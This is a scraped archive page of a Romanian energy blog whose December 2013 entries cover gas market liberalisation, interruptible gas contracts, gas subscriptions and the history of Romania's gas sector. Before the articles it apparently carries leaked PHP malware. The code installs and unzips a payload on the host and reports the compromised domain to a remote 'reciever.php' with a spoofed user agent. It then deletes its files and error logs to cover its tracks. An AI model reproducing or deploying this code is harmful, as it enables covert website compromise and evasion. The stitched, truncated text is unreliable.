'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> December | 2013 | Dumitru Chisalita | Page 2

Rss

Archives for : December2013

Exportul de gaze intercomunitar

Liberalizarea pieţei gazelor naturale începută în anul 1986 în UK, continuată în Europa dupa anul 1998 a determinat necesitatea introducerii pe piaţa a noi instrumente comerciale care să asigure funcţionalitatea pieţei. Peste 30 de noi instrumente comerciale au fost introdu-se pe pieţele gazelor naturale în ultimii 15 ani. Între acestea se găseşte şi capacitatea de backhaul rezervată într-un punct din sistemul de transport unde nu se poate asigura curgerea fizică a gazelor.

Continue Reading >>

Intreruptibilitatea pe piata gazelor naturale si subminare a economiei nationale?

Scandalul “Gaze ieftine pentru industria chimica”, in care sunt implicati inclusiv 2 ministrii, a demarat  in jurul unei notiuni: “intreruptibilitatea gazelor”. Clientii stabiliti prin lege ca fiind intreruptibili, au beneficiat de discounturi importante in perioada 2007-2010 la achizitia gazelor naturale. Un instrument comercial deosebit de util pe piata gazelor din intreaga lume, a fost deturnat in Romania pentru favorizarea unor clienti. 

Continue Reading >>

Evitarea incapacităţii de plată prin abonamentul pe gaze

Incapacitatea de plată a unor consumatori în perioada rece se datorează și sistemului de tarifare existent făcând ca anumiţi consumatori să fie categorisiţi ca vulnerabili din această situaţie. Introducerea unui Abonament de gaze ar putea diminua impactul plății consumului de gaze în perioada rece şi să avantajeze consumatorii.

Continue Reading >>

De ce un abonament pentru gaze naturale?

 

Liberalizarea pieţei gazelor naturale, care a adus beneficii în multe ţări din lume, a demonstrat necesitatea de a asigura sprijin social pentru consumatorii cu venituri scăzute, dar a demonstrat şi necesitatea identificării unor mecanisme de subvenţionare a mijloacelor de reducere a nivelului consumului de energie, indirect de reducere a costurilor cu energia pentru consumatori.

Continue Reading >>

Acțiuni pe vorbe. Lipsa de fundamentare

Secolul XXI a adus utilizarea tehnicilor specifice în vederea înlocuirii intuiţiei ca mijloc primordial în luarea deciziilor şi fundamentarea acestora pe o cercetare amănunţită a dependenţelor dintre diferite variabile ce intră în corelaţie în cadrul fiecărui fenomen studiat. Nu şi în România!

Continue Reading >>

Gazele neconvenţionale

Multiplele întrebări privind gazele neconvenţionale, asociate adesea cu gazele şist, îşi pot găsi răspunsul în analiza modului de formare al gazelor în scoarţa terestră, a condiţilor geologice în care acestea se formează şi se acumulează.

Continue Reading >>

De ce a fost ales Mediaşul reşedinţa societăţii de gaz?

Descoperirea gazelor naturale în Bazinul Transilvaniei, conduce la înfiinţarea în anul 1915 a Societăţii maghiare de gaz (U.E.G.) cu sediul la Budapesta şi concesionarea acesteia a locaţiilor: Cetatea de Baltă, Şaroş, Bazna, Zaul de Câmpie, Sânger, Şincai, Nadeş, Teleac în vederea exploatării şi valorificării gazelor naturale. Unirea Transilvaniei cu România (1918), conduce la punerea sub sechestru al bunurilor societăţii U.E.G. a cărui capital majoritar era cel german. Se impunea astfel organizarea activităţii, înfiinţarea unor compartimente de specialitate, atragerea şi angajarea de geologi, ingineri, contabili, economişti, tehniceni etc. şi construirea unui sediu unde aceştia să-şi desfăşurătoare activitatea. Pentru alegerea locului construirii acestuia trebuia să se ţină seama de următoarele aspecte:

Continue Reading >>

Istoria mutării gazului la Bucuresti

Pe măsura trecerii timpului responsabilitatea pentru activitatea desfăşurată în sectorul gazelor este tot mai mică şi se bagă tot mai multă putere în claxon şi tot mai puţin în motorul acestei industrii. Ideea mutării gazului la Bucureşti este una veche şi ea apare în permanenţă, în special în mintea unor oameni care vor cu orice preţ să se evidenţieze.

Continue Reading >>

Strategia energetică trebuie să înceapă cu strategia de securitate energetică

Strategia trebuie să fie un document cu o structură formală, care are rolul în primul rând de disciplinare a celui care îl concepe, îl ajută să își aranjeze gândurile, cifrele și concluziile într-o ordine logică, ce poate fi urmărită și de către alții, superiori sau subordonați deopotrivă. Elaborarea unei Strategii de Securitate Energetică, necesită o nouă abordare, radical diferențiată de cele care au existat în anii anteriori.

Continue Reading >>

Coordonarea resurselor, surselor, rutelor, pieţelor şi preţurilor fac diferenţa între securitatea şi insecuritatea unei ţări.

Energia este esenţială pentru dezvoltarea economică, socială şi îmbunătăţirea calităţii vieţii”, Agenda 21 a ONU din anul 1992.

Continue Reading >>